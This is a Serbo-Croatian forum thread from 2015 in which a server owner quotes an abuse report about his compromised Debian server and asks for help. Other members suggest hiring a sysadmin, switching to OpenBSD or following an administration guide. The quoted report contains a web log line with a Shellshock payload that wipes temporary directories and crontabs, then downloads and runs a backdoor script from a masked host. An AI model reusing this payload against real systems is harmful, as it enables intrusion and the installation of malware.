[ dendic @ 01.05.2015. 06:47 ] @
|
| Sta uradit na starom serveru ako dobijete ovakvo upozorenje?
From: chopper boy <[email protected]>
Date: 2015-04-29 9:55 GMT+02:00
Subject: Compromised server / Exploit attempts
To: "[email protected]
Compromised server / Exploit attempts
Exploit attempts via bash variable push. Downloads bash script which
installs backdoor Trojan.Hacktool.Linux.Bf.E and starts additional exploit
scans against other servers.
Compromised server:
5.135.167.145
xxx.xxx.xxx.xxx (IP -mog servera)
Exploit bash scripts:
http://xxx.xxx.xxx.xxx/i.gif
http://xxx.xxx.xxx.xxx/nynew54.gif
Exploit scans address lists:
http://198.27.67.24/news/<xxx>
http://198.27.67.24/download/<xxx>
5.135.167.145 - - [28/Apr/2015:14:45:57 -0700] "GET HTTP/1.1 HTTP/1.1" 400
304 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type:
text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf
/tmp/* ; rm -rf /var/tmp/* ; crontab -r ; killall -9 wget curl lwp-download
b f r xx y i.gif print start pscan pnscan ps ; wget
http://xxx.xxx.xxx.xxx/i.gif ; curl -O http://xxx.xxx.xxx.xxx/i.gif ; chmod +x
i.gif ; nohup ./i.gif &
\");'" |
[ Tyler Durden @ 01.05.2015. 09:47 ] @
platiti nekog iskusnog sysadmina da ti sredi servere i odrzava ih.
[ dendic @ 01.05.2015. 12:30 ] @
A platio bi ja za pomoc kad bi se imalo cime platit.Zato i sluze ovi forumi da covjek priupita :-) A ti znas da ima danas sposobnih sysadmina uz ovlike napade i probleme u zadnjih godinu-dvije?
[ DusanSukovic @ 01.05.2015. 19:10 ] @
Instalisi OpenBSD :)
[ tarla @ 04.05.2015. 10:52 ] @
Već sam se zabrinuo kako nema dugo neke tvoje teme.
Iskreno, imaš pogrešan pristup poslu. Ostaviš sve otvoreno pa onda kripiš umjesto da ideš po nekoj "krštenoj" knjizi.
Skini neki PDF o administraciji i prođi redom sve. Vidiš i sam da zapinješ na svakom koraku...
Mislim bez uvrede ali praviš tako probleme drugima čije servere napadaju zbog tvoje nesmotrenosti i neznanja...
[ dendic @ 08.05.2015. 13:37 ] @
Tarla daj neki pdf brate da nabacim zaštite ako se šta može na staroj mašini po kapacitetima na kojoj se vrti debian 5 a vec izašo 8 " Jessie,šta mai"?
[Ovu poruku je menjao dendic dana 08.05.2015. u 14:53 GMT+1]
[Ovu poruku je menjao dendic dana 08.05.2015. u 15:05 GMT+1]
Copyright (C) 2001-2024 by www.elitesecurity.org. All rights reserved.